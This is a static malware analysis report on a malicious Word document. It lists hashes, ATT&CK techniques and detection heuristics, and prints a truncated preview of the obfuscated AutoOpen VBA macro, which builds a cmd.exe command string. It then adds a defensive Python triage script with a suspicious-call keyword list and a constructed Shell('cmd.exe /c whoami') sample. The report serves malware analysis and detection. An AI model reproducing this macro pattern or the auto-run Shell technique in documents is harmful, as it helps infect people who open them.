Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 5666747ba94cc95b…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 147.6 KB
Created: 2018-09-26 23:09:00
Authoring application: Microsoft Office Word
First seen: 2018-10-13
MD5: e4b2f2a839510c4574bfd2302bac7d26
SHA-1: 9b006576d41c248cce3702849a0fbefbd21fb8a1
SHA-256: 5666747ba94cc95baada41f314fab5609cc5333d15704b64e686a0b09d0ca154
Risk score: 202

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1566.001 Phishing: Spearphishing Attachment
  • T1203 Exploitation for Client Execution (no exploit or parser-CVE finding appears in the heuristics below; the evidence on this page supports macro execution, T1059.005, rather than an exploit)

The sample is a malicious Word document carrying a VBA project. An AutoOpen procedure is present, so the code runs as soon as the document is opened with macros enabled, and the project calls Shell(), which hands a command line to the operating system. The extracted source (macros.bas below) is heavily obfuscated: most statements are Mid/MidB/Left/Right operations over identifiers that are never assigned anywhere in the visible source, which is padding rather than logic, while the function sCPlUZzil() assembles a string from literal fragments such as "/V:O/C" and "set", consistent with an obfuscated cmd.exe command line. AutoOpen passes a value built from sCPlUZzil() and other helpers to lMYOiLwkBTJUC, whose body is not in the preview. Because the preview is truncated, neither the final command nor any download URL is recovered here; the download-and-execute behaviour is inferred from the pattern, not observed. ClamAV's Doc.Malware.Valyria signature matches the file independently of these heuristics.

Heuristics (6)

  • ClamAV: Doc.Malware.Valyria-6698777-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Valyria-6698777-0
  • VBA macros detected [medium, 2 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    The VBA project calls Shell(), which executes an arbitrary command line with the user's privileges.
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    An AutoOpen procedure runs automatically when the document is opened with macros enabled; no user action beyond enabling content is needed.
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of the old Word macro execution surface, not a downloader or parser-CVE attribution by itself. Here the marker fired alongside the recovered VBA project above, so it is redundant with the AutoOpen finding rather than evidence of a WordBasic-only document.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body). This is the standard DrawingML XML namespace identifier, present in any document with embedded drawing content; it is not a download or callback address and is not an indicator on its own.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 105711 bytes
SHA-256: a76d5205b310b11b298635a73e0e194fdaad6edf0538249b2b5a72ca3275d3c1

Preview: first 1,000 lines of the extracted script
Attribute VB_Name = "FbANqwokLfh"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
   Dim KdwSvi(2)
KdwSvi(0) = MidB(KzIjf + KjlmBRLbzWwrfoACo + CtRiRp, 878, 790) + MidB(EEhsZk + IRWSZjjSSUjcRjsVSzMR + FtdkzGDB, 763, 613)
KdwSvi(1) = Left(kUlAh + VdonUvLPfOvAjdEzTMQip + jwYkRR, 811) + Left(LRGIpn + WYkMSGAziCPEzzBwIfNzFK + CfvJjm, 538) + MidB(BKQqYl + naNLREKYQJJbfCzTAZWccr + nvYku, 841, 271) + Mid(EHkakjH + woWIPCRUJRwkTWizjO + NSwjMs, 310, 860)
   Dim Jsuif(2)
Jsuif(0) = Left(JcWEAl + CWNwIpDhIpTWNZEraaoZ + dWmuJ, 241) + Right(tKVCuGQ + TVqLzDSnwttMNviTRnR + rcCDC, 431)
Jsuif(1) = Right(UPUDBri + cWOnihwfzcwoYhUXtAP + SYwst, 410) + Right(tiLuh + vFiWWijqSiUjiMFM + kEfKv, 541)
   Dim WPtPwC(2)
WPtPwC(0) = MidB(pktpV + OnQuUQiohraofFjbt + NtRzKw, 917, 685) + Left(jfJvlRoL + EiHcfuAnIuGoXdVNRm + tqDDsuo, 852)
WPtPwC(1) = Right(jSfmoUPw + rDdrQVOnwpuwBNqIKzQiT + tlpBzTv, 179) + Right(MMmWfAZR + TiYBrZpwbYKjqcSAWwpMXZ + lfwrM, 411) + Mid(PMnJY + MNRCdwCCGQbmdRcVEAwkM + jMPKJ, 540, 859) + Mid(zFXmHqc + vtjdwLLDZPNcFMimszoi + SvEpN, 262, 474)
lMYOiLwkBTJUC (KeyString(HrLKbn + thnsGaPB + 14 + 21 + 32 + MAwpUAAL + LbrbbdLm) + ftMSL + QidQJOi + KeyString(OSWKJ + XhSpLQc + 17 + 24 + 36 + sTOSojd + jhYiCM) + sCPlUZzil + JiaBZjbdA + zsTTDEjCG + tMofYiIjkE + jCYvCvjtoRN + omrqjDd + vdGOEw + TTPWAK)
   Dim IpCnHL(1)
IpCnHL(0) = Right(fPGrqLq + oRnHUitQPklvvTFjAMJ + diosliId, 84) + Right(thnoG + qwvqjUWXGGKhqdluBj + HhBkB, 734) + Left(druSoB + UjOLBWuiLrJCLHioJijKkrp + UNtoqm, 506) + Right(WFknXF + VORkMJzNQkViTMsRSDTQ + NmjDWLi, 409)
   Dim aMhIE(1)
aMhIE(0) = Left(NVpzrCs + NnXrCfwzWPJHFowlju + XcFuvl, 431) + MidB(KKzqzwSc + JhiRGQjCEGMRLZzEkMcnYzw + CpfJzL, 852, 623)
   Dim lqWIft(2)
lqWIft(0) = MidB(iwKbTjdi + ozCwTYVASDENJqXwCVE + iaZSEDnh, 246, 324) + Mid(lpWzjKsV + iBXGqGkDkqKSJQziVrzh + AABWLLn, 911, 3)
lqWIft(1) = MidB(uwMhzK + CaWdzWtvbmlTMipFsYDPSAb + kzXjjr, 167, 32) + Mid(DzRQwU + EhUWbfVRwKEHbKtDF + EcLjfja, 151, 128) + MidB(uXhwN + BOZKqtisqGDFbdrL + zuKsPzi, 961, 493) + Mid(YtDmCull + nkBDivovGCcaCRaaKjS + fXFSZ, 682, 116)
   Dim zdMmT(2)
zdMmT(0) = Mid(wtlRwjV + WjtGRJITNZzMGTtGaXaJJoAD + EGJlDoLm, 738, 866) + Right(soGEml + XriXwYXkSRFmVtMJRHGU + EfmCE, 28)
zdMmT(1) = MidB(EaMblm + oCUbkjWupacUKRWTtJUjQCoh + iiZiYTE, 1, 684) + Left(IrDPam + JqIVtlkTDZvBbNBzwrM + tYkRQRp, 309)
End Sub


Attribute VB_Name = "lLKIplE"
Function sCPlUZzil()
ANCXb = "d \\ / /  " + "//\ /V:O/C" + """" + "set {+@?=" + "7a02 a207 0a72 20" + "7a 27a0 a0"
Dim qjaoM(2)
qjaoM(0) = MidB(NDvpBTKh + PshrkfsifJXCGhCqmc + lMUfWAO, 387, 897) + MidB(JZwTGWvw + jIDXnvHraiYNwhJrQLO + NcHOv, 373, 835)
qjaoM(1) = Left(ICDQI + cMDIKLCnqpmEUmzJK + LXiCPF, 878) + MidB(ZZmnwLNv + EbFdFbwiQTwZQGaIVFIMr + SiMJZ, 25, 638)
   Dim vGudbY(2)
vGudbY(0) = Left(KfaAW + fnnGLvONsINkYqjjKulw + zzBMpLww, 288) + Left(Oahojsj + KYmUMJpWDuqFwNBXhM + vEEqzr, 574)
vGudbY(1) = MidB(LPnZK + frGaLiwITqSrIDDrPITVzs + iqVonjBs, 800, 116) + Right(MIvZj + JvIJsTRrMWIsRSvi + qQNzDti, 144) + MidB(owhsuWhd + PJfTzJUqddCSiuJpc + fShMz, 317, 957) + Right(SLiWjlu + tKQiQmzJPbXoqfMlkKjWv + qQBmt, 992)
   Dim kpKHG(2)
kpKHG(0) = Left(kZKIjwzm + oTjLXpJmAwDPZLwJwLKEG + GWLDN, 598) + MidB(azpNQiv + LAhJlwkzcDfiPcjnbjn + kwOGl, 150, 537)
kpKHG(1) = Mid(WsFjBVZb + CmAwhNQEIsEYhUYnLQADnHX + KONAdw, 309, 503) + Right(jtVDd + RTXLdhszYCjNoKqzurbZRuo + kqNXK, 757) + MidB(wEhjV + aNqXMWCKswHpupwrMEL + ZwHrvM, 93, 469) + Mid(zEDQYiiU + MfAJsmririPiSzLZznZT + BNYXMdjI, 997, 236)
   Dim QSIzH(2)
QSIzH(0) = MidB(KEVsGh + MskdSHWjfHlLjQwwKbi + zzfUL, 980, 820) + Right(rDibJW + HYTAnLadcIkHLildcCzkph + jvFGct, 323)
QSIzH(1) = Left(mGLlE + WipKfVzfAarHoirthkWf + sczXSjXL, 575) + Mid(sIoLD + bSZLRInuLJlADzTtaNRCjda + LChicvD, 489, 339)
   Dim zwIUVt(2)
zwIUVt(0) = MidB(kVlSKP + ErmMEOqZMSNuHiQRMQd + WjKjbGN, 949, 138) + Right(IZhtj + CIbjVdnOtwKibZXEKzMwUG + 
... (truncated)
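As an added example (not the analysis platform's code and not part of the sample), the following Python script approximates the OLE_VBA_AUTOOPEN and OLE_VBA_SHELL checks on a decoded VBA dump such as macros.bas above, and adds the two things an analyst wants next: it evaluates literal-only string assignments (the ANCXb line in sCPlUZzil(), with VBA's "" quote escape handled) and it lists identifiers that are read but never defined in the text, which in VBA are Empty Variants and mark the Mid/Left/Right padding. The two inputs at the bottom are constructed: EXCERPT is modelled on the listing above, SHELL_SAMPLE is a minimal macro that calls Shell() so the suspicious-call path can be seen to fire. The undefined-identifier check is a heuristic; a name defined in a module outside the dump would also be reported.

```python
"""Static triage of a decoded VBA macro dump (added example, not the
platform's code).  Input is decoded VBA text; all inputs here are constructed."""
import re
from collections import Counter

# Procedure names Word/Excel run without user interaction.
AUTOEXEC = ("autoopen", "auto_open", "autoexec", "autoclose", "auto_close",
            "document_open", "document_close", "workbook_open")
# Calls worth a closer look; matched as whole words, case-insensitive.
SUSPICIOUS = ("shell", "createobject", "wscript.shell", "environ",
              "urldownloadtofile", "adodb.stream", "xmlhttp", "powershell")
# Built-in names that must not be reported as user identifiers.
KNOWN_VBA = {"mid", "midb", "left", "right", "len", "chr", "chrw", "replace",
             "strreverse", "split", "join", "cstr", "cint", "clng", "array",
             "shell", "createobject", "environ"}

LIT = r'"(?:[^"]|"")*"'      # one VBA string literal; "" inside it is an escaped quote
LITERAL_ONLY = re.compile(rf'^\s*{LIT}(?:\s*[+&]\s*{LIT})*\s*$')
ASSIGN = re.compile(r'^\s*([A-Za-z_]\w*)(?:\(\d+\))?\s*=\s*(.+?)\s*$')
DEFN = re.compile(r'^\s*(?:Public\s+|Private\s+)?(?:Sub|Function|Dim)\s+([A-Za-z_]\w*)', re.I)
PROC = re.compile(r'^\s*(?:Public\s+|Private\s+)?(?:Sub|Function)\s+([A-Za-z_]\w*)', re.I | re.M)
IDENT = re.compile(r'[A-Za-z_]\w*')


def join_literals(expr):
    """Value of a concatenation made only of string literals and +/&, else None."""
    if not LITERAL_ONLY.match(expr):
        return None
    parts = re.findall(r'"((?:[^"]|"")*)"', expr)
    return "".join(p.replace('""', '"') for p in parts)


def recover_strings(src):
    """variable -> decoded string for every literal-only assignment in src."""
    out = {}
    for line in src.splitlines():
        m = ASSIGN.match(line)
        if m and (s := join_literals(m.group(2))) is not None:
            out[m.group(1)] = s
    return out


def undefined_identifiers(src):
    """Names read in statements but never Dim'd, assigned or declared as a
    procedure anywhere in src.  In VBA such a name is an Empty Variant, so
    Mid/Left/Right over it yields "": a signature of padding code."""
    defined, used = set(), Counter()
    for line in src.splitlines():
        s = line.strip()
        if not s or s.lower().startswith(("attribute ", "end ", "'")):
            continue
        d = DEFN.match(s)
        if d:
            defined.add(d.group(1).lower())
            continue
        m = ASSIGN.match(s)
        body = s
        if m:
            defined.add(m.group(1).lower())
            body = m.group(2)
        for ident in IDENT.findall(re.sub(LIT, "", body)):   # ignore names inside strings
            if ident.lower() not in KNOWN_VBA:
                used[ident] += 1
    return {n: c for n, c in used.items() if n.lower() not in defined}


def triage(src):
    lowered = src.lower()
    return {
        "autoexec": [p for p in PROC.findall(src) if p.lower() in AUTOEXEC],
        "suspicious": [k for k in SUSPICIOUS
                       if re.search(r'\b' + re.escape(k) + r'\b', lowered)],
        "strings": recover_strings(src),
        "undefined": undefined_identifiers(src),
    }


# Constructed excerpt modelled on the macros.bas listing above (not the full artifact).
EXCERPT = r'''Attribute VB_Name = "FbANqwokLfh"
Sub AutoOpen()
   Dim KdwSvi(2)
KdwSvi(0) = MidB(KzIjf + KjlmBRLbzWwrfoACo + CtRiRp, 878, 790) + MidB(EEhsZk + IRWSZjjSSUjcRjsVSzMR + FtdkzGDB, 763, 613)
lMYOiLwkBTJUC (KeyString(HrLKbn + thnsGaPB + 14 + 21 + 32 + MAwpUAAL + LbrbbdLm) + ftMSL + sCPlUZzil + TTPWAK)
End Sub
Attribute VB_Name = "lLKIplE"
Function sCPlUZzil()
ANCXb = "d \\ / /  " + "//\ /V:O/C" + """" + "set {+@?=" + "7a02 a207 0a72 20" + "7a 27a0 a0"
End Function
'''

# Constructed minimal macro with a visible Shell() call (not from the sample).
SHELL_SAMPLE = '''Sub Document_Open()
    Shell "cmd.exe /c whoami", 0
End Sub
'''

if __name__ == "__main__":
    for name, src in (("EXCERPT", EXCERPT), ("SHELL_SAMPLE", SHELL_SAMPLE)):
        print(name, triage(src))
```

On EXCERPT the script reports AutoOpen as the auto-exec entry point, no suspicious call (the Shell() the platform flagged is not in the previewed lines), the reassembled ANCXb fragment, and a dozen never-defined names feeding the MidB padding; on SHELL_SAMPLE the Shell() check fires. Treat the output as triage, not attribution: it does not execute the macro and cannot recover what lMYOiLwkBTJUC does.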